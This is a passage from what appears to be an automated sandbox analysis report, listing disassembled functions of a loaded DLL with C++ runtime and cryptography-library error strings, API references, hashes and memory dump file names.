                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 6894470B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: string too long
                                            • API String ID: 1785806476-2556327735
                                            • Opcode ID: f17b922d30a5c755f4e7104ea3040eb0ed36cf797fc6407fe2f302b928d9c148
                                            • Instruction ID: abb71f0f25645275e9eb7643c8edda434d7b1102a8c407d73f301a64f838d69c
                                            • Opcode Fuzzy Hash: f17b922d30a5c755f4e7104ea3040eb0ed36cf797fc6407fe2f302b928d9c148
                                            • Instruction Fuzzy Hash: E4110B365053115FE730DD78A8C0A3FB7A8AF51318FB00B2FE4A783681D762E44A8B61
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68950201
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            • OutputStringPointer, xrefs: 6895018C
                                            • StringSink: OutputStringPointer not specified, xrefs: 6895019B
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                            • API String ID: 3718517217-1331214609
                                            • Opcode ID: e123ed3907a48f84777b88e23865809eaadb0fdfa3e20186691b2eead3bddf45
                                            • Instruction ID: cf2bd16537a64ba9320b824fdea17df58b3a1ed2d27f8b64339d8275621f4396
                                            • Opcode Fuzzy Hash: e123ed3907a48f84777b88e23865809eaadb0fdfa3e20186691b2eead3bddf45
                                            • Instruction Fuzzy Hash: 27217C74D44248AFCB14DFD8D890BADFBB4FB59304F40821AE825A7281DB369A04CB51
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6894E4DF
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: GeneratableCryptoMaterial: this object does not support key/parameter generation$PAj?Q
                                            • API String ID: 3718517217-1742105936
                                            • Opcode ID: 88a63520072fed0dc28eae15f6f0b858f450718596a6bf433e3551b536c850ba
                                            • Instruction ID: 4c01aade4719c7834402ba845a0e812b7d59bad3b76f701c48769698f07f4b46
                                            • Opcode Fuzzy Hash: 88a63520072fed0dc28eae15f6f0b858f450718596a6bf433e3551b536c850ba
                                            • Instruction Fuzzy Hash: 86117C74D00248AFCF10DFA8C890AEEFBB8BF15308F90825AE42167291DB75DA04CF51
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6897BCFE
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$vector<T> too long
                                            • API String ID: 1823113695-1352351690
                                            • Opcode ID: f466299e18d1e30c074d9bb725350baa3322f814e571ac5d944b51ebdd1ccb6c
                                            • Instruction ID: 31424a4b35beaee25e1a254884ceb9e9995bc20970dc7975b72870a926b5e680
                                            • Opcode Fuzzy Hash: f466299e18d1e30c074d9bb725350baa3322f814e571ac5d944b51ebdd1ccb6c
                                            • Instruction Fuzzy Hash: FD211AB6904605DFC720CF69D980A6ABBF8FB58714F50CA6EE46AD7740E730E504CBA1
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68982C69
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: Aj?Q$CFB_Mode: invalid feedback size
                                            • API String ID: 3718517217-747500968
                                            • Opcode ID: df99abcbc7a45bed06a3c19ea0488780c4382850fe18faff9c6e2bf667fc71df
                                            • Instruction ID: 7be293cbb7bd5875856301f2e4a59cce9113b60d273cb4f592ab445d283b9b96
                                            • Opcode Fuzzy Hash: df99abcbc7a45bed06a3c19ea0488780c4382850fe18faff9c6e2bf667fc71df
                                            • Instruction Fuzzy Hash: 832157B4108380AFC310CF68C981A6BBBE5BBA9714F904A2EF0A583390D775D808CB53
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944636
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A913A
                                              • Part of subcall function 689A9125: __CxxThrowException@8.LIBCMT ref: 689A914F
                                              • Part of subcall function 689A9125: std::exception::exception.LIBCMT ref: 689A9160
                                            • _memmove.LIBCMT ref: 6894466F
                                            Strings
                                            • invalid string position, xrefs: 68944631
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: invalid string position
                                            • API String ID: 1785806476-1799206989
                                            • Opcode ID: a4e57c087c1614668a26dd5760599531b0db085e3ec8b9831c56887395f1991e
                                            • Instruction ID: 69fee71416ac0589bc67699073233d5a7501d16fc32df667c40f9775aa2a8c85
                                            • Opcode Fuzzy Hash: a4e57c087c1614668a26dd5760599531b0db085e3ec8b9831c56887395f1991e
                                            • Instruction Fuzzy Hash: B401D6313012418BD3348D6CEC84A2AB3AAEBD1714B64492DF195CB701D6B1EC438BA1
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6894279F
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: PK_MessageEncodingMethod: this signature scheme does not support message recovery$QAj?Q
                                            • API String ID: 3718517217-3998235892
                                            • Opcode ID: d4f845589cd107f04143607e2274e788c65d849f1755e960a9e47295cfe7a51a
                                            • Instruction ID: 1f1fd5b7b94cf1bd209d14d694268dcab2de07658e3e79dbee049ba6f550c225
                                            • Opcode Fuzzy Hash: d4f845589cd107f04143607e2274e788c65d849f1755e960a9e47295cfe7a51a
                                            • Instruction Fuzzy Hash: 55112E70C45248AEDB10DFD9D890BEDFBB8AB25314F90421AE42167280DB759608CF51
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 689447F9
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: :Aj?Q$AllocatorBase: requested size would cause integer overflow
                                            • API String ID: 3718517217-2177431009
                                            • Opcode ID: ddf9a800804f0d17c94821849c7dd36ccaf62af8c93ab3532b9eeea247ae0e40
                                            • Instruction ID: 5fb400d0f193761c0767199014ceb6a3c372a3f934d3fe30989d5f1015b249b6
                                            • Opcode Fuzzy Hash: ddf9a800804f0d17c94821849c7dd36ccaf62af8c93ab3532b9eeea247ae0e40
                                            • Instruction Fuzzy Hash: CA115C70D05288AFCB14CFE9D891BEDFBB8FB15318F50422AE82167280DB359604CF51
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6897ACF8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: Modulus$PublicExponent
                                            • API String ID: 2241493438-3324115277
                                            • Opcode ID: 390f31626667cea80bf82aedd08286e2550f93e91caea4eafb7970cdc40e3df9
                                            • Instruction ID: 7416264247816bdcdd66b3ebb852a23904e22ba1fc6cd40f8cd0c6dd7f904766
                                            • Opcode Fuzzy Hash: 390f31626667cea80bf82aedd08286e2550f93e91caea4eafb7970cdc40e3df9
                                            • Instruction Fuzzy Hash: 4E11E030A083049FC610DF3C894155FFBE4EFE6648F80862EF4916B290EB31D948CB96
                                            APIs
                                            • type_info::operator!=.LIBCMT ref: 6899B848
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: type_info::operator!=
                                            • String ID: Modulus$PublicExponent
                                            • API String ID: 2241493438-3324115277
                                            • Opcode ID: a03c047f2f82f574bfa0318e5b2711598f5acaa319af1b10f0b12fba2db7f3b3
                                            • Instruction ID: deb3966e6abdc6a7139b770de83e1d34a76f61c1b5f35e3f21178a428667cbdd
                                            • Opcode Fuzzy Hash: a03c047f2f82f574bfa0318e5b2711598f5acaa319af1b10f0b12fba2db7f3b3
                                            • Instruction Fuzzy Hash: BC11CE34A08344AECA00DF2D884155AFBF8EFE6248F84066EF8915B251EB75D948CB96
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6897B605
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 6897B634
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1785806476-3788999226
                                            • Opcode ID: b67db141851f2590d1e9d73f4a40ff57a98289a3027957612b25eef1481e7514
                                            • Instruction ID: 7318e322d9ac67fa4923876dadac4ce003d55d269bb4fda2570dd0ce7d434113
                                            • Opcode Fuzzy Hash: b67db141851f2590d1e9d73f4a40ff57a98289a3027957612b25eef1481e7514
                                            • Instruction Fuzzy Hash: 850184B26002059FD724DEA9DC95C6BB3ECEF542547544A2DE9ABC3650E671F804CB60
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689A4241
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689A4277
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<bool> too long
                                            • API String ID: 1785806476-842332957
                                            • Opcode ID: e720bbc1dc0347a1e76e21a25c30d8c9eb042200c0232b621ec06fcb3d795e16
                                            • Instruction ID: f67d52a9c0306431363dd133055143931c74d59677bd7e0c4eaf49d2db804de9
                                            • Opcode Fuzzy Hash: e720bbc1dc0347a1e76e21a25c30d8c9eb042200c0232b621ec06fcb3d795e16
                                            • Instruction Fuzzy Hash: A101DF72A001055FC714CF69DCD08AEB3A9FB84398F91422AE92687644EB31E909CAA1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689A3855
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 689A3880
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1785806476-3788999226
                                            • Opcode ID: a7e164c8cc971a3565c273a09b4088b96fa941831afcb45a484a1545c86487b1
                                            • Instruction ID: 12f1241ebcccf86b9848f40f7ac8173ef0a5e96d80e43600baf96943b426f31c
                                            • Opcode Fuzzy Hash: a7e164c8cc971a3565c273a09b4088b96fa941831afcb45a484a1545c86487b1
                                            • Instruction Fuzzy Hash: D0018FB25006099FD324DFBDDC8486BF3ECEF542147918A3DE5AAD3A50EA71F8008B60
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68955173
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • _memmove.LIBCMT ref: 6895519E
                                            Strings
                                            Memory Dump Source
